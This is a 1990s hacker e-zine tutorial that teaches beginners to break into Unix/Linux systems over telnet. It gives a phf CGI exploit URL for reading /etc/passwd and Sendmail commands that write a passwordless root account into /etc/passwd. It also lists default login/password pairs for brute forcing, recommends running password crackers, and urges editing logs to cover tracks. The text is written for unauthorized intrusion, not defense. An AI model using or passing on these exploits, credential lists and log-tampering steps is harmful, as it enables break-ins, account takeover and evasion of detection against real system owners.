***Hacking Unix/Linux systems*** Via Telnet By: Techno Phunk O.k, there has been enough virus writing things in our e-zine and I finaly descided to jump in and talk a little about hacking for your first lesson I am going to teach you a LITTLE about hacking linux/unix system's via telnet, later I will teach more about telenet (Sprintnet) and direct dialup's, and eventialy I will teach you how to hack VAX/VMS, but not until you master Unix/linux should you even ATTEMPT a VAX, belive me, it's for the elite's only as it is NOT as bugy as linux/unix. anyway a little history on unix. History --=====-- The unix OS originated from AT&T in the early 1970's Because UNIX was able to run on diffrent hardware from diffrent vendors, this made developers to modify the OS and distribute their own versions. USL's (new makers) system V, Berkeley Standar Distibution (DSD, From the university of California, Berkley), Xenix, etc are just a few examples. Now on with the show... The unix system/linux system has been known to have Multiple exploits that can be used agianst them, one of which is the famous phf bug: http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd this bug of course is almost totaly outdated, exception of alot of the less known .edu sites, and .gov/.net sites. Of course many other bugs are also unique to this system such as the Sendmail bug's such as the one where the software could send mail DIRECTLY to a file so someone could write a extra acount to the passwd file, and gain root acces. I personaly have a multitude of exploits that I have put into my memory and I could use anywhere without refering to any files. from here on, I will be telling alot more about hacking of unix systems (and linux, there basicly the same people) from a telnet platform, what to do, etc.... First of all, before hacking a system, examin it, and get all the info you can get on it, finger them(port 79), Ping them, do whatever you can to get all the info possible, think about who the sysop is, etc just don't do any destruction as this is *LAME*, it makes you a CYBERPUNK not a hacker, and last but not least it makes people WANT to catch you and to spend money looking for you, also the FBI/Secret Service won't take the case unless 1000$ of damages are done. Now then ------ You need a good telnet program, such as the one that comes with Win95 or my personal favorite: EWAN, anyway, any telnet software should be fine. You will also need a ppp/slip/Winsock connection. If you are on AOL, don't dispare it will work as long as you use V.3.0 of AOL or above. Now that you have found a good telnet program we can go on... now somehow you must get a password to this system preferably to the Sysadmin acount or Root (unfortunatly, the root account can only be remotly accessed on Redhat linux, and some of the BSD's) or any of the shell's (if you wish) anyway, there are several ways to do this. first would be social engeniring, if that is possible social engenering is quiet simple, all you must do, is trick a person into giving you information. A leson on Social Engineering will be covered in the next file (if I get around to it, in this issue) Next you can pull an exploit such as the phf bug (if it hasn't allready been taken off) and if you do pull the phf bug, if the file looks like this: root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh daemon:*:1:1:system background account:/: ^ notice the star then forget it, since this file is shaddowed, you will need to try something else but if it looks sorta like this: root:WAdadtiA:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh daemon:dCDa2Hn:1:1:system background account:/: (file will look SOMETHING like this) then you are home free to d/l this and then run a pw cracker on it, yet this is not hacking yet... in order for any type of bust in (into a computer) to become a hack you must learn about the system, how it works and the like, since hacking is simply a way of gathering information. now if the phf bug or one of the many exploits works, and you get the UNshadowed PW file, then all you must do is, crack it, write down or save all the logins and passwords that where found(some do this for you) I personaly use cracker jack with multiple word lists and now move on to the next stage which will be picked up on after I tell what to do if this doesn't work. If no exploits work then your going to have to go with the next part...Brute forcing and defaults I will be nice and include one of my personal (ONE of them) lists that I use for brute forcing. Brute forcing is covered in the latest issue of 2600 magazine (Volume #14, 3, Autum 1997), but I will explain this anchient art here too. Brute Forceing is basicly the act of hamering out passwords at a specific acount name (such as in this example: sysadmin) until you get in, this is the last resort to get into a system that seems to have NOOO exploits or wide open back doors. Brute forcing can be tiediosly done by hand or simply by a script. The problem with Bruting Unix systems is that after 3 login attempts (in most casses) will simply log you off, so you would simply have to see how many chances you have and then program the script accordingly. Keep in mind that all your activities are probably going to be loged, so once you get in, modify those logs to cover up your tracks, or use a program (avialable almost ANYWHERE). Anyway....here is a list of default passwords and login's to try first before you attempt a brute force. In most cases this list may work, or then agian it may not, it just depends on the system admin IQ :). ------------------------------------------------------------------ Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo SYSTEM OPERATOR SYSTEM MANAGER SYSTEM SYSTEM SYSTEM SYSLIB OPERATOR OPERATOR SYSTEST UETP SYSTEST SYSTEST SYSTEST TEST SYSMAINT SYSMAINT SYSMAINT SERVICE SYSMAINT DIGITAL FIELD FIELD FIELD SERVICE GUEST GUEST GUEST unpassworded DEMO DEMO DEMO unpassworded TEST TEST Note: unpassworded means to just hit enter when it prompts for a PW ------------------------------------------------------------------- Now then, I will now cover some basic exploits, etc and the brute fource list will be attached to the bottom of this file. Exploits. ========== Most exploits covered here are probably not going to work on like the CIA, or something like that, but thease are clasic and common exploits. If you want to see more "up to date" exploits I recomend rootshell.com which has a NICE collection which are useful for some situations. The following bugs will need you to have at least an IQ of 2 and telnet/ftp/http/etc programs. First of all I'd like to cover some of the "sendmail exploits" One of the most famous, but usualy uncommon to work (on up-to-date systems) in otherwords if the system your hacking is up-to-date and older, and is updated CONSTANTLY, then chances 10-1 it won't work, but you never know so TRY IT! never hurts to T-R-Y. When people say "teach me to hack" I say "Trial-and-error" and that is all, what else do I need to say? well basicly this exploit takes advantage of Sendmail's ability to send mail DIRECTLY to files on the host system, e.g TO: /etc/passwd anyway, what you do is basicly send mail to the passwd file and then you login with the "unpassworded" root access'ed acount that you create. Now since I know this is a "newbie" file I will now explain a bit about sendmail, how to use it, what it is, it's past, future, and it's role in the Unix/Linux/Bsd enviroment. Sendmail which is a oviosly a SMTP program, SMTP stands for Simple Mail Transfer Protocule if I am correct (I hit my head many times on walls and things) anyway, basicly it allows a user to sendmail to any internet or local user. The Sendmail program like the finger program run on a certain port, like finger runs on port 79, and is USUALY open for remote acces, but sendmail (port 25) is ALWAYS open, unless the user doesn't use sendmail which that is still EXTREEMLY unusual, and only people that I know that don't run it are fellow hackers. Anyway so in order to access it you must *TELNET* (remember that program I told you to get) to port 25 of your target machine, now in order to get the target machines TCP or IP you must do a whois (or a DNS lookup) now, you may get a dns lookup/whois program for winblows all you need is a valid internet connection, but I use either a. a shell acount or b. internic (http://www.internic.com) c. /dns on mIRC in other words /dns yahoo.com then it will say: Resolved yahoo.com to then a number which is the IP, now you have the IP/TCP of you target you must telnet to that 'host'. Now if your smart or like me, you WILL be sure you know all the information possible about your "target". Back onto sendmail, now when you first connect it SHOULD say SOMETHING like this: Sendmail 8.3.2 (host) ready to go....anyway, something like that Once you see this, hit enter (it should report something like unknown command) this is needed since we are using a telnet program, not a SMTP program. anyway from here you can explore the commands, type HELP, otherwise hang with me for a few now from here to pull the exploit you do the following. Mail FROM: root@whatever.com (this could be whatever you want) RCPT TO: /etc/passwd now if it says "can not send mail directly to files" then forget this exploit then type: data then it should say something like: Type your message and type a period (".") on a blank line when done then you type: Wizard::0:0:Super User:/:/bin/csh . now it should say mail excepted for delivery now then you can change Wizard to whatever, but for a beginer, just leave it. Now since this worked, you may now go threw "normal" telnet (port 23) and Login would be: Wizard and then password, just hit enter, now wasn't that easy? Now, one more program you may want to get is called a port scanner this will find all open ports for you and tell you what they are now for those with trouble finding one here is a list of "cool" ports to try out (BTW- this is from my personal collection, I don't remember however where I got this): note: some of thease will work on some systems, other won't (chance) ----------------------------- tcpmux 1/tcp # rfc-1078 echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp domain 53/udp mtp 57/tcp # deprecated bootps 67/udp # bootp server bootpc 68/udp # bootp client tftp 69/udp gopher 70/tcp # gopher server rje 77/tcp finger 79/tcp http 80/tcp www 80/tcp link 87/tcp ttylink kerberos 88/udp kdc kerberos 88/tcp kdc supdup 95/tcp # BSD supdupd(8) hostnames 101/tcp hostname # usually to sri-nic iso-tsap 102/tcp x400 103/tcp # ISO Mail x400-snd 104/tcp csnet-ns 105/tcp pop-2 109/tcp # PostOffice V.2 pop-3 110/tcp # PostOffice V.3 pop 110/tcp # PostOffice V.3 sunrpc 111/tcp sunrpc 111/tcp portmapper # RPC 4.0 portmapper UDP sunrpc 111/udp sunrpc 111/udp portmapper # RPC 4.0 portmapper TCP auth 113/tcp ident # User Verification sftp 115/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/tcp # Network Time Protocol ntp 123/udp # Network Time Protocol netbios-ns 137/tcp nbns netbios-ns 137/udp nbns netbios-dgm 138/tcp nbdgm netbios-dgm 138/udp nbdgm netbios-ssn 139/tcp nbssn imap 143/tcp # imap ntwrk mail prtcl NeWS 144/tcp news # Window System snmp 161/udp snmp-trap 162/udp exec 512/tcp # BSD rexecd(8) biff 512/udp comsat login 513/tcp # BSD rlogind(8) who 513/udp whod # BSD rwhod(8) shell 514/tcp cmd # BSD rshd(8) syslog 514/udp # BSD syslogd(8) printer 515/tcp spooler # BSD lpd(8) talk 517/udp # BSD talkd(8) ntalk 518/udp # SunOS talkd(8) efs 520/tcp # for LucasFilm route 520/udp router routed # 521/udp too timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc # experimental conference 531/tcp chat netnews 532/tcp readnews netwall 533/udp # emergency broadcasts uucp 540/tcp uucpd # BSD uucpd(8) UUCP serv klogin 543/tcp # Kerberos authen rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs# Brunhoff rem filesys rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental pcserver 600/tcp # ECD Integrated PCb svr mount 635/udp # NFS Mount Service pcnfs 640/udp # PC-NFS DOS Authen bwnfs 650/udp # BW-NFS DOS Authen kerberos-adm 749/tcp # Kerberos 5adm/changepw kerberos-adm 749/udp # Kerberos 5adm/changepw kerberos-sec 750/udp # Kerberos authen--udp kerberos-sec 750/tcp # Kerberos authen--tcp kerberos_master 751/udp # Kerberos authen kerberos_master 751/tcp # Kerberos authen krb5_prop 754/tcp # Kerberos slave propaga listen 1025/tcp listener RFS remote_file_sharing nterm 1026/tcp remote_login network_terminal kpop 1109/tcp # Pop with Kerberos ingreslock 1524/tcp tnet 1600/tcp # transputer net daemon mud(2000) 2000/tcp ## Diku2 MultiUser Dimen cfinger 2003/tcp # GNU finger nfs 2049/udp # NFS File Service eklogin 2105/tcp # Kerberos encrypT rlogi mud(4000) 4000/tcp ## Diku2 MultiUser Dimen mud(4240) 4240/tcp ## Diku2 MultiUser Dimen mud(4242) 4242/tcp ## Diku2 MultiUser Dimen krb524 4444/tcp # Kerberos 5 to 4 ticket irc(6666) 6666/tcp ## Alternate IRC port irc 6667/tcp # Internet Relay Chat irc(6668) 6668/tcp ## Alternate IRC port dos 7000/tcp msdos ------------------------------------------------------------------- anyway, now, I won't list many more exploits now as there are millions of them on the net, expspcialy around http://www.rootshell.com now, I will go into what you do once you are in.... commands that are usefull to you at this time are going to be things like: ls * list files cd * change DIR note: cd .. goes back, cd / is used instead * of the MS-DOS equivilant: cd\ who * who's online finger * get info on a user pico * one of the text editors cat * display file (like type in Ms-dos) cc * compiler for C programs (exploits ;) that should get you started, note that this should work in C shell and in korn shells... Now, lastly, I hope that you have learned something from all this... more info can be found at: http://www.angelfire.com/nc/TechnoPhunk/index.html under the hacking page. I am trying to get more stuff on it, but there is some other tutorials and other info there. so be sure to stop by Now, for a word on ethics.... 1. though shalt not change anything except for the logs (to cover yourself) 2. though shalt not do destruction 3. don't tell your friends/family/etc that you are a hacker 4. never tell your real name to other hackers 5. never leave behind your handle or name on a hacked server 6. be kind that's about all for this lesson....I relise it was short, and not VERY informative, but it should give you a start. I hope to cover more on Unix hacking next time, possibly a bit more on the BSD's and Linux. Send me sugestions....TechnoPhunk@thepentagon.com - Techno Phunk